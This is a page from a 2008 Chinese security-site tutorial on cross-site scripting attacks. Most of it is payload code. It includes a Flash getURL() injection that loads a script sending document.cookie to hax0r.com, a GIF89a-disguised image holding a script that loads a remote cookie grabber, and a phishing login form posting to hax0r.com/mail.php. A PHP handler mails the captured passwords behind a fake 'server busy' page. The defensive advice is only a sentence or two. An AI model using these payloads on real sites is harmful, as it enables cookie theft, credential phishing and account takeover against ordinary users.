通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
跨站脚本-攻击和防御指向
责任编辑:酷酷の鱼   更新日期:2008-7-15
 

 

getURL()这个函数是有趣的,可以用来我们的攻击。这个函数可以帮我们改变最终用户到其它页面。

它的语法是这样的:

getURL(url:String, [window: String,[method:String]])

如:

getURL("http://lovelaozang.cn/login.php?logout=true","_self";

url: 网站的地址

window: 指定框架要求(_self, _blank…)


method: 请求方法 GET or POST (by defect GET)

这里的处理动作和JavaScript以发布警报:

getURL("javascript:alert('XSS'";

在2002年表现出这种形式的危险
这种方式是一种可以发送用户的cookie的;

getURL("javascript:alert(document.cookie)"

在2005年12月,开辟新的途径,并出现构成已受益于两年前XSS和可能性,把一个文件Flash放在签名中,以提供一个永久性跨站脚本

攻击此外,作者的这种另类使用的技术,以便传给公司,以背离蠕虫着XSS的德萨米:Samy 重装上阵

用flash窃取cookie?
不是,但有技术的做:
如:
在一个FLASH文件:

GetURL("http://www.victime.com/page.php?var=<script src='http://www.lvoelaozang.cn/hack.js&#39;></script>","_self";

在这个hack.js文件里面有如下代码:

document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;

这个解决方法很简单:就是禁止flash文件在你的WEB应用上使用.

兴个例子,我们来新建一个hack.gif文件.然后用记事本打开文件,删除所有的内容,然后写入代码

GIF89a<script>alert("XSS"</script>

保存退出.
上传hack.gif到相就的地方...此时跨站发生
不要用Mozillia Firefox来访问那张图片,Mozillia 不会执行我们的alert.要用Internet explorer.

为什么添加GIF89a ?
因为很多上传程序会来检查我们的gif文件是否包含 'GIF89a',如果包括则认为是gif文件.

GIF89a<script src="http://lovelaozang.cn/cookiegrabber.php"></script>

我们需要知道一些其它格式图片,头部所包含的代码.

PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ

为了安全不要仅仅只检查getimagesize()

你是否明白什么是钓鱼?什么是XSS?

在这个例子里,有必需找到一个易受攻击的网站去XSS并注入那里,身于一种形式,以自己直接在网址以下代码

<p>Enter your login and password, thank:</p>
<form action="http://hax0r.com/mail.php">
<table><tr><td>Login:</td><td><input type=text length=20 name=login>
</td></tr><tr><td>assword:</td><td>
<input type=text length=20 name=password>
</td></tr></table><input type=submit value= OK >
</form>

这个通过这个模仿的表单,然后利用mail.php通过电子邮件把表单里的数据发送给你。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_GET_VARS["password"];
mail("email@example.com", "Cookie stealed ! - thx xyli ", $password , $login );
?>
<body>
<h2><strong>Error</strong> -<strong> Server too much busy</strong></h2>
</body>
</html>

用户会认为,服务器可能超过了负载,并不会怀疑

上一页  [1] [2] [3] 
  • 上一篇文章:
  • 下一篇文章:
    • 最近更新
    推荐文章 瑞星公司07月15日发布 每日计算机病毒及木马播报
    普通文章 赛门铁克:7月垃圾邮件现状报告
    普通文章 微软7月安全补丁与ZoneAlarm防火墙冲突
    普通文章 瑞士垃圾邮件比例最高
    普通文章 “记事本”的杀毒功能
    普通文章 Word存远程代码执行漏洞
    普通文章 华为赛门铁克预计明年推出40G接口防火墙
    普通文章 国际黑客组织扬言对北京奥运发动网上攻击
    推荐文章 推荐:三大措施设置数据库安全 保障网站安全运营
    普通文章 最新“艾妮”感染型病毒下载器行为分析
    热门文章
    普通文章奥运安全杂谈:别让你的电脑给奥运抹黑鬼
    普通文章微软本月将发4个重要级安全补丁
    普通文章IE8新增反恶意软件保护功能
    普通文章黑客侦察目标几种常用技术解析
    普通文章巧妙删除Linux下的U盘顽固病毒
    普通文章18岁黑客开博卖病毒 欲饿死杀毒软件商
    普通文章七步让木马与你断绝关系
    推荐文章卡巴斯基防火墙反黑客的设置技巧
    普通文章提升诺顿杀毒功能的5个小技巧
    普通文章发现病毒无法清除怎么办?教您彻底查杀病毒
    精彩专题